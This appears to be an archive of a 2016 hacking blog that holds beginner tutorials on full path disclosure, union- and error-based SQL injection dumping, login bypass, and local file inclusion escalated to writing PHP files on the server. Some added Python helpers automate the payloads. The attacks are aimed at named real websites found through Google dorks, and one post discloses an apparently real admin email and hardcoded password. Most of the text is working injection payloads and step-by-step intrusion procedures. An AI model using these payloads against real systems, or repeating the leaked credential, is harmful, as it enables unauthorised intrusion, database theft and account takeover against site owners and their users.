Saturday, April 16, 2016

Getting Full Path Disclosure (FPD)

!! FOR EDUCATIONAL PURPOSES ONLY !!
I Introduction
Today I'm going to show you how to get a full path disclosure, also known as FPD.

II Learning Basics
What is FPD?
FPD, or Full Path Disclosure, is when the application reveals the absolute path of its files on the server's filesystem, i.e. the internal layout of the installation.
Example:
/home/www/htdocs/

Why do attackers sometimes need an FPD?
Because several follow-up attacks need the absolute path. The usual case is writing a backdoor shell through SQL injection with INTO OUTFILE: MySQL writes the file exactly where you tell it, so you have to know where the web root is.
Example: you visit www.website.com/index.php;
on the server that file lives at /home/www/htdocs/index.php.

III Getting Full Path Disclosure
1) Using errors.
In SQL injection you often get the FPD for free, as long as PHP prints its errors to the page (display_errors on). Break the query:
http://jornaldacidadearuja.com.br/guia/det.php?id=19'
If you see an error like
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/jornaldacidade/public_html/site/include/mysql.inc.php on line 142
you already have the FPD: the site lives under /home/jornaldacidade/public_html/. Easy.

2) Using an empty array
Take a page such as
www.website.com/?page=about
and turn the page parameter into an array by adding []:
www.website.com/?page[]=about
PHP now hands the script an array where it expects a string. Functions such as opendir() or include() reject it and, if error reporting is enabled, print a warning that names the script, for example:
Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84
or
Warning: pg_num_rows(): supplied argument … in /usr/home/example/html/pie/index.php on line 131

3) Google dorks
You can also search for pages whose PHP warnings a search engine has already indexed. Example dork:
Warning: * [function.*]: site:www.website.com

Or search by IP address instead of hostname (ip: is a Bing operator, not a Google one):
ip:xxx.xxx.xxx.xx * [function.*]:

You can make your own dorks if you want.
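As an added example (not part of the original post), here is a small Python helper that automates the two manual tricks above: it turns each query parameter of a URL into its array form (page[]=about) and pulls the disclosed paths out of whatever PHP warnings come back. The sample response body and the host name www.website.com are constructed for the demo; the script sends no requests, you feed the mutated URLs to your own client and hand the bodies to extract_paths().

```python
import os
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Tail of a PHP warning/notice: "... in /abs/path/script.php on line 142"
PHP_ERROR_PATH = re.compile(
    r"\bin\s+(/[^\s:]+?\.(?:php|inc|phtml))\s+on\s+line\s+(\d+)"
)

# Constructed sample response: two PHP warnings from one (hypothetical) host.
SAMPLE_BODY = (
    "Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given "
    "in /home/www/htdocs/include/mysql.inc.php on line 142\n"
    "Warning: opendir(Array): failed to open dir: No such file or directory "
    "in /home/www/htdocs/index.php on line 84\n"
)


def array_param_variants(url):
    """One URL per query parameter, with that parameter turned into an array.

    page=about becomes page[]=about: PHP hands the script an array where it
    expects a string, and functions such as opendir() or include() then emit
    a warning naming the script's full path if display_errors is on.
    """
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    variants = []
    for i, (name, value) in enumerate(params):
        mutated = list(params)
        mutated[i] = (name + "[]", value)
        query = urlencode(mutated, safe="[]")  # keep [] readable in the URL
        variants.append(urlunsplit(parts._replace(query=query)))
    return variants


def extract_paths(body):
    """Return (path, line) pairs for every PHP error found in a response body."""
    return [(m.group(1), int(m.group(2))) for m in PHP_ERROR_PATH.finditer(body)]


def guess_document_root(paths):
    """Longest common directory of the disclosed paths; usually the web root."""
    dirs = [os.path.dirname(p) for p in paths]
    return os.path.commonpath(dirs) if dirs else None


if __name__ == "__main__":
    for u in array_param_variants("http://www.website.com/index.php?page=about&lang=en"):
        print("try:", u)
    found = extract_paths(SAMPLE_BODY)
    for path, line in found:
        print("disclosed:", path, "line", line)
    print("document root:", guess_document_root([p for p, _ in found]))
```

The document-root guess is only a heuristic: it takes the deepest directory shared by all disclosed paths, which is right when every warning comes from files under the web root and wrong when one of them points at a shared library outside it.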

IV Goodbye
So that's all for now. I hope you enjoyed the post; if you have questions or feedback, please say so in the comments!

Union Based DIOS (Dump In One Shot) SQL Injection

!! FOR EDUCATION PURPOSES ONLY !!

I Introduction
Hey guys! Today I'm going to show you how to do a DIOS in a union-based SQL injection.

II Learning Basics
So here we go again: you need the basics first. Of course you already know them, I just want to repeat them.

1)Google dorks
What are Google dorks?
Google dorks are search operators such as "inurl:" and "intext:" that narrow a search to pages of a particular shape.

Why do we need them?
We don't really need them... just kidding, of course we need them to find target websites!

How do we use them?
Go to Google and search: " inurl:news.php?id= "
You'll see results like www.website.com/news.php?id=5

II Finding target
google : " inurl:news.php?id= "
You can make your own Google dork if you want; the common dorks are

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19

so get some target and lets start.

III Checking if vulnerable to SQL Injection

After getting a website target, we will now check if its vulnerable to SQL injection or not.
example this is my target : http://jornaldacidadearuja.com.br/guia/det.php?id=19

Add a single quote ( ' ) to the end of the number:
http://jornaldacidadearuja.com.br/guia/det.php?id=19'

If you now see an error message, or the page looks broken, there is a good chance it is vulnerable to SQL injection.
If the page still loads normally it is not a good candidate for this tutorial: it may still be vulnerable (blind injection), but the quick error check won't show it.

What to do if it's not vulnerable?
Find another website, of course.

IV Counting vulnerable columns
Once you've found that it is vulnerable, count the columns of the original query with ORDER BY.
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1--
Increase the number until you get an error.

http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1-- ("No error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 2-- ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 10--("No error?!")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 100000--("No error?!!")

If that happens, you reach 100000 and still get no error,
it means the id is used inside a quoted string in the query (WHERE id='19 order by 100000--'), so your ORDER BY is just part of the string and never reaches the parser.

So how do we fix it?
Close the string with a quote ( ' ) after the number and finish with --+ (the + becomes a space in the URL; MySQL needs a space after -- for it to count as a comment).
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 1--+

Start (jumping by 10 and then narrowing down saves requests compared with counting 1, 2, 3, ...):
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 10--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 20--+ ("ERROR")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 15--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 16--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 17--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 18--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 19--+ ("Error!!!!")

There we go! ORDER BY 18 works and ORDER BY 19 fails, so the query has 18 columns. Now let's find out which column the page displays.

V Getting injectable column
Now that we know there are 18 columns, we'll find the injectable (displayed) column.
Our payload is " and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ": the and false removes the original row, so the only row left to display is ours, and the page shows the numbers of the columns it prints.
so the url will be http://jornaldacidadearuja.com.br/guia/det.php?id=19' and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
Hey! The number 6 shows up on the page, so column 6 is the injectable column.

VI DIOS ( Dump In One Shot )
Our Dump In One Shot payload goes into column 6 in place of the 6. It walks information_schema.columns in a single query, accumulating every schema, table and column name into the user variable @a (0x3c62723e is <br>, used as a line break in the output):
(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,' ',column_name), (column_name))))))a)
And voilà! Dumped in one shot!

VII Magic Quotes enabled
If it didn't work for you, magic quotes may be enabled.
What are magic quotes?
magic_quotes_gpc escapes every " ' " in request data to " \' ", so the string literals in the payload break. (It was removed in PHP 5.4, so this only matters on old servers.)
How to bypass it?
Easy: write every string literal as a hex number instead; MySQL treats 0x... as a string, so no quote character is needed. The payload becomes
(select(@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,0x203a3a20,@tbl:=table_name,0x20,column_name), (column_name))))))a)
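To show why the hex version works, here is an added Python example (mine, not the author's) that rewrites every single-quoted literal in a payload as a 0x hex literal, decodes the 0x constants so you can read what they are, and drops the result into column 6 of an 18-column union as used above. It reproduces the hex values in the payload above; the defaults 18 and 6 are the column numbers from this target, and the DIOS string is the one from section VI.

```python
import re

# Single-quoted literals in a MySQL payload (no escaped quotes inside, which
# holds for the DIOS payload above).
QUOTED = re.compile(r"'([^']*)'")


def to_hex_literal(text):
    """'abc' -> 0x616263. MySQL reads 0x.. as a binary string, so it compares
    and concatenates exactly like the quoted literal, without any quote."""
    if not text:
        raise ValueError("MySQL has no quote-free spelling of the empty string")
    return "0x" + text.encode("utf-8").hex()


def from_hex_literal(lit):
    """Reverse of to_hex_literal, for reading payloads: 0x3c62723e -> '<br>'."""
    return bytes.fromhex(lit[2:]).decode("utf-8")


def strip_quotes(payload):
    """Rewrite every '...' literal in the payload as a 0x literal."""
    return QUOTED.sub(lambda m: to_hex_literal(m.group(1)), payload)


def union_payload(ncols, injectable, expr):
    """'union select 1,..,expr,..,n' with expr in the column the page shows."""
    cols = [expr if i == injectable else str(i) for i in range(1, ncols + 1)]
    return "union select " + ",".join(cols)


# The DIOS expression as written in section VI, before hex-encoding.
DIOS = (
    "(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from "
    "(information_schema.columns) where (table_schema!='information_schema') "
    "and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), "
    "Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,' ',column_name), "
    "(column_name))))))a)"
)


def quote_free_dios_injection(ncols=18, injectable=6):
    """Full query-string suffix for this target: quote-free DIOS in column 6
    of 18, after 'and false' so only our row is displayed."""
    return "' and false " + union_payload(ncols, injectable, strip_quotes(DIOS)) + "--+"


if __name__ == "__main__":
    print(from_hex_literal("0x3c62723e"))  # the <br> separator
    print(quote_free_dios_injection())
```

Only the literals inside the payload are rewritten; the leading quote that closes the original string in the WHERE clause still has to reach the server intact, which is why magic quotes on a string-context injection is a harder problem than just hex-encoding.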

VIII Goodbye
I hope you learned something from this tutorial. If you have questions or feedback, please feel free to comment!

SQL Injection Login Bypass

!! FOR EDUCATION PURPOSES ONLY !!
I Introduction
Today I'm going to show you how to bypass a login panel using SQL injection.

II Learning Basics
1) Google Dorks
What are Google dorks? Google dorks are search operators such as "inurl:" and "intext:" that narrow a search to pages of a particular shape.

Why do we need them?
We don't really need them... just kidding, of course we need them to find target websites!

How do we use them?
Go to Google and search: " inurl:login.php "
You'll see results like www.website.com/login.php

2)SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? Wikipedia, of course.

3)SQL injection
SQL injection is an attack that inserts attacker-controlled text into SQL statements, so the attacker can read, add, update or drop data in the database.

III Finding target
After learning some basics, we'll find a target using Google dorks.
Examples of google dorks:
inurl:login.php
inurl:admin.php
inurl:administrator.php
inurl:admin_login.php

IV Bypass Login
So after finding a target, we'll try to bypass its login.
Example, this is our target:
http://www.voteforgoodleader.com/h/launch.php?m=home&sm=acc&l=en
Try logging in with " a' or '1'='1 " (without the double quotes) as both the email and the password.
And bam! We bypassed the login!

Why?
Suppose the query looks like this:

select username,pass from users where username='a' or '1'='1' and password='a' or '1'='1' limit 0,1;

AND binds tighter than OR, so the condition reads username='a' OR ('1'='1' AND password='a') OR '1'='1'. The final or '1'='1' is always true, so the query returns the first row of users (usually the admin) whatever you typed.

V Extras
If " a' or '1'='1 " didn't work, you can try some of these (-- and # cut off the rest of the query as a comment; the ) variants are for queries that wrap the condition in parentheses):
a' or true--
a' or 1=1--
a') or true--
a' or 1=1#
a) or ('')=('
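As an added example, not from the original post, here is a Python simulation of the query above against an in-memory SQLite database: the vulnerable string-built login beside a parameterized one, with the page's payloads run through both. SQLite stands in for MySQL here, so the MySQL-only # comment fails, which also shows why you try several payloads in turn. The users row is constructed for the demo.

```python
import sqlite3


def make_users_db():
    """Constructed sample database: one admin row. Plaintext password only to
    keep the demo short; real code stores a salted hash and compares that."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (username text, password text)")
    db.execute("insert into users values ('admin', 's3cret-demo')")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """The tutorial's query, built by string formatting. Returns the username
    of the first matching row, or None when nothing matched."""
    sql = (
        "select username,password from users "
        "where username='%s' and password='%s' limit 1" % (username, password)
    )
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return None  # broken syntax: the real page would show a SQL error
    return row[0] if row else None


def login_safe(db, username, password):
    """Same query with bound parameters: the input is data, never SQL."""
    row = db.execute(
        "select username,password from users where username=? and password=? limit 1",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Payloads from the post. The ')' form only fits parenthesised conditions,
# and '#' is a MySQL comment that SQLite does not know.
PAYLOADS = ["a' or '1'='1", "a' or 1=1--", "a') or ('')=('", "a' or 1=1#"]


def which_payloads_bypass(login):
    """Try each payload as both username and password; report the ones that log in."""
    db = make_users_db()
    return [p for p in PAYLOADS if login(db, p, p) == "admin"]


if __name__ == "__main__":
    print("vulnerable login falls to:", which_payloads_bypass(login_vulnerable))
    print("parameterized login falls to:", which_payloads_bypass(login_safe))
```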

VI Goodbye
That's all for now, I hope you enjoyed the tutorial! If you have feedback or questions, please feel free to comment.

Friday, April 15, 2016

Error based mapper and Union based mapper Chrome Extension

Error based : https://drive.google.com/open?id=0B9Iw4TQ-C_xCZmItbnpGRVpEaWc
Union based : https://drive.google.com/open?id=0B9Iw4TQ-C_xCQmtta2ZIZkd5MVE
Open-source Chrome extension made by z3r07y-kn0w

Installation:
Step 1) Extract the rar archive
Step 2) Go to chrome://extensions
Step 3) Enable Developer mode
Step 4) Click "Load unpacked extension" and pick the extracted folder
Step 5) Open the extension's options

Using:
I don't know how to use it myself yet either, but it's easy to pick up, so good luck!

LFI (Local File Inclusion) 100% noob [BASIC]

!! FOR EDUCATION PURPOSES ONLY !

I Introduction
Hey guys, today I'm going to show you LFI (Local File Inclusion).

II Learning Basics
First we'll learn some basics.

1) Google Dorks
What are Google dorks?
Google dorks are search operators such as "inurl:" and "intext:" that narrow a search to pages of a particular shape.

Why do we need them?
We don't need them... just kidding, of course we need them to find target websites!

How do we use them?
Go to Google and search: " inurl:index.php?page=news.php "
You'll see results like www.website.com/index.php?page=news.php

So what's next?

2) LFI
Local File Inclusion is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application

IV Getting a backdoor using LFI
First we'll try to read /etc/passwd to confirm that the include follows path traversal.
../ moves up one directory, into the parent.

www.website.com/index.php?page=/etc/passwd
www.website.com/index.php?page=../etc/passwd
www.website.com/index.php?page=../../etc/passwd
www.website.com/index.php?page=../../../etc/passwd (Worked!)

Next, we'll include /proc/self/environ, which lets us execute PHP code.
www.website.com/index.php?page=../../../proc/self/environ (Worked!)

If it works you should see something like this (the variables are NUL-separated, so the browser runs them together):
DOCUMENT_ROOT=/home/www/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5HTTP_CONNECTION=keep-aliveHTTP_HOST=localhostHTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0PATH=/bin:/usr/binPHPRC=/usr/local/lib/QUERY_STRING=page=../../../../proc/self/environREDIRECT_STATUS=200REMOTE_ADDR=182.68.251.152REMOTE_PORT=21007REQUEST_METHOD=GETREQUEST_URI=/?page=../../../../proc/self/environSCRIPT_FILENAME=/home/www/public_html/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=103.28.12.130SERVER_ADMIN= _NAME=localhostSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=ApacheUNIQUE_ID=U@e2lmccDCgAB3SNHk0AAAA

If you see something like 'HTTP_USER_AGENT=Mozilla' then you're good to go: the User-Agent header you send is written into that file, and because the file is being passed to include(), any PHP code you put in the header gets executed.

a) If you're using Google Chrome it's easier, because you don't need any extension:
Step 1) Press F12
Step 2) Click "Toggle device mode"
Step 3) Click "Responsive"
Step 4) Click "Edit"
Step 5) Click "Add custom device..."
Step 6) Enter any device name; we'll set the User-Agent there later

b) If you're using Mozilla Firefox, install Live HTTP Headers or Tamper Data

So change the User-Agent to <?php phpinfo() ?>
If you see the phpinfo() page, change the User-Agent to a snippet that writes a file into the web root (use the full <?php tag; the short <? form only works when short_open_tag is enabled):
<?php $file = fopen("shhacked.php", "w"); fwrite($file, "<?php phpinfo(); ?>"); fclose($file); phpinfo(); ?>
Now check www.website.com/shhacked.php
There you go, well done.
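Added example, not from the original post: Python models of what include($_GET['page']) effectively does with the traversal payloads above, next to a hardened resolver (allowlist plus a realpath check that the file stays under the web root). It also computes how many ../ a given DOCUMENT_ROOT (which the environ dump above reveals) needs. The temporary web root and the page names news and about are constructed for the demo.

```python
import os
import tempfile


def traversal_payload(document_root, target):
    """Enough ../ to climb from the document root to /, then the target:
    /home/www/public_html -> ../../../etc/passwd"""
    depth = len([p for p in document_root.split("/") if p])
    return "../" * depth + target.lstrip("/")


def include_vulnerable(web_root, page):
    """What include($_GET['page']) effectively resolves: the request controls
    the whole path, so ../ sequences and absolute paths escape the web root."""
    return os.path.normpath(os.path.join(web_root, page))


def include_safe(web_root, page, allowed=("news", "about")):
    """Hardened resolver: an allowlist of page names (so no user-controlled
    separators or wrappers), plus a realpath check that the result stays
    under the root even if a symlink is involved."""
    if page not in allowed:
        raise ValueError("page not in allowlist: %r" % page)
    root = os.path.realpath(web_root)
    path = os.path.realpath(os.path.join(root, page + ".php"))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("resolved path escapes the web root")
    return path


def run_demo():
    """Build a throwaway web root and run both resolvers on the post's inputs."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    for name in ("news", "about"):
        open(os.path.join(root, name + ".php"), "w").close()
    results = {
        "vuln_passwd": include_vulnerable(root, traversal_payload(root, "/etc/passwd")),
        "vuln_environ": include_vulnerable(root, traversal_payload(root, "/proc/self/environ")),
        "vuln_absolute": include_vulnerable(root, "/etc/passwd"),
        "safe_news_ok": include_safe(root, "news") == os.path.join(os.path.realpath(root), "news.php"),
    }
    for bad in ("../../../etc/passwd", "/etc/passwd",
                "php://filter/convert.base64-encode/resource=index.php"):
        try:
            include_safe(root, bad)
            results[bad] = "included"
        except ValueError:
            results[bad] = "blocked"
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```

The allowlist is what does most of the work: once the request can only pick a name from a fixed set, neither ../ nor a php:// wrapper has anywhere to go, and the realpath check is a second line of defence for the day someone drops a symlink into the web root.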

V Read files using LFI
OK, let's make this quick.
php://filter is a meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior to the contents being read. For us it means we can read source code instead of executing it: if you include a .php file directly, PHP runs it and you only see its output, but with the base64-encode filter the raw source comes back as text. It works on any file the web server user can read (configuration/database.php is the classic target), not only PHP files.
USAGE : php://filter/convert.base64-encode/resource=file name here
for example: https://icrpv5.org/index.php?page=php://filter/convert.base64-encode/resource=includes/process_login.php

You'll get a base64 string. Decode it at http://shunz19.blogspot.com/2016/04/string-tools.html

Once decoded you'll see "if ($email == "admin@icrpv5.org" AND $password == '2015icrpvB4L1')". Easy: the email is admin@icrpv5.org and the password is 2015icrpvB4L1, hardcoded in the source.

VI Tips
If /proc/self/environ doesn't load, the alternative is log poisoning: send a request with PHP code in a header that gets logged (the User-Agent again) and then include the log file. For that you need to be able to include the Apache access or error log, and on most current setups the log files are not readable by the web server's user, which makes this "impossible" there. Paths worth trying when they are readable:

Some common log files:

/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log

VII Goodbye
If you have feedback or questions, please feel free to comment! That's all for now, bye!

String tools

Error Based SQL Injection 100% Noob! [BASIC]

!! FOR EDUCATION PURPOSES ONLY !!

I introduction
Hey guys, today I'm going to show you error-based SQL injection!
What's the difference between union-based and error-based?
1) Union-based is harder than error-based, I think.
2) In union-based you find the number of columns and put your data in the column the page displays; in error-based you provoke a database error that carries the data inside the error message.
3) You don't need to count columns in error-based.


II Learning basics
First we'll learn some basics.

1) Google Dorks
What are Google dorks?
Google dorks are search operators such as "inurl:" and "intext:" that narrow a search to pages of a particular shape.

Why do we need them?
We don't need them... just kidding, of course we need them to find target websites!

How do we use them?
Go to Google and search: " inurl:news.php?id= "
You'll see results like www.website.com/news.php?id=5

So what's next?

2) SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? Wikipedia, of course.

3) SQL Injection
SQL injection is an attack that inserts attacker-controlled text into SQL statements, so the attacker can read, add, update or drop data in the database.

So after those basics, we'll move on to the next basic: basic SQL injection, 100% for the beginner.

III Gathering
After the basics, we'll gather some information.

Part 1 : Finding target website
To find a target website we use Google dorks.
Let's google: " inurl:page.php?id= "

You can make your own dork if you want; here are some examples:

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19

inurl:buy.php?id=19

So get some target and lets start.

Part 2 : Checking if vulnerable
After getting a target website, we'll check whether it's vulnerable to SQL injection or not.
Example, this is my target: leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

Add a single quote ( ' ) to the end of the number:
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'

If you see something like this:
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

the raw MySQL error is printed on the page, which is exactly what error-based injection needs.
If the page breaks but shows an error that doesn't look like that, I suggest checking my article about union-based SQL injection.

If it loads normally, get another target.

Part 3 : Getting right comment
Now that we know it's vulnerable to error-based injection, we need the right way to close the query. Try adding " '--+ " after the id number; _PAYLOAD_ marks where the injected SQL goes later.
The url now will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'_PAYLOAD_--+

If the page loads normally, the id is used inside a quoted string: our quote closes it, --+ (a -- followed by a space) comments out the rest, and nothing breaks. If the page shows an error instead, the id is probably used as a bare integer and the quote itself is the problem; drop the quote, and the comment is just --:
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1_PAYLOAD_--

For my target the right form is '--+

Part 4 : Checking version
Let's verify that it's really vulnerable to error-based injection by extracting the version. Add +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 to the payload.
How it works: FLOOR(RAND(0)*2) with a fixed seed always yields the same sequence of 0s and 1s, and when MySQL groups by a value containing it, the temporary table it builds receives the same key twice and the query dies with a duplicate-key error. The key is our CONCAT_WS(...), so the data we asked for ends up in the error message. (The trick needs at least three rows to group over, which is why the later payloads group over INFORMATION_SCHEMA.TABLES.)

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+

There we go, we got the version:

Duplicate entry '5.5.48-cll:1' for key 'group_key'

The MySQL version is 5.5.48-cll.

Part 5 : Getting databases
After getting the version, we'll get the database names. The payload is +OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+

And there we go, we got the current database name. To list the other databases, use this payload, which reads information_schema.schemata one row at a time (LIMIT 0,1 is the first row) and groups by a value built from it; the trailing 0x7e (~) marks where the name ends: +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

so the link will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'information_schema~1' for key 'group_key'

So the first database is information_schema.
Now increase the LIMIT offset by 1 to get the next database name.

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'leettime_761wHole~1' for key 'group_key'

The second database name is leettime_761wHole. Now let's check for a third database:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

If the page loads normally, there is no third database: LIMIT 2,1 returned no row, so the subquery is NULL and no duplicate key is produced.

Part 6 : Getting tables
After getting the database names, we'll get the tables of that database.
The database name in my target is leettime_761wHole.

Go to http://shunz19.blogspot.com/2016/04/string-tools.html and hex the database name. Writing it as a hex literal means we never need a quote character inside the payload (handy when quotes get escaped) and MySQL still compares it as the same string.

Now leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
then add 0x at the start, so "0x6c65657474696d655f37363177486f6c65"

Our payload to get the tables is +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

So our link will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'testtable1~1' for key 'group_key'

The first table is testtable1.
Let's check for another table by increasing the offset by 1:

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'userlogs~1' for key 'group_key'

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

Duplicate entry 'users~1' for key 'group_key'

Keep increasing the offset until the page loads normally; then you have all the tables.

Part 7 : Getting columns
After getting the databases and tables, we'll get the columns of a table.

Our payload to get the columns is: +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=_HEXTABLE_+AND+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
(It filters on both table_name and table_schema, so a users table in some other database on the same server doesn't get mixed in.)

So the hex of users is "7573657273"
and leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
Add 0x in front of both.

The url will be

leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

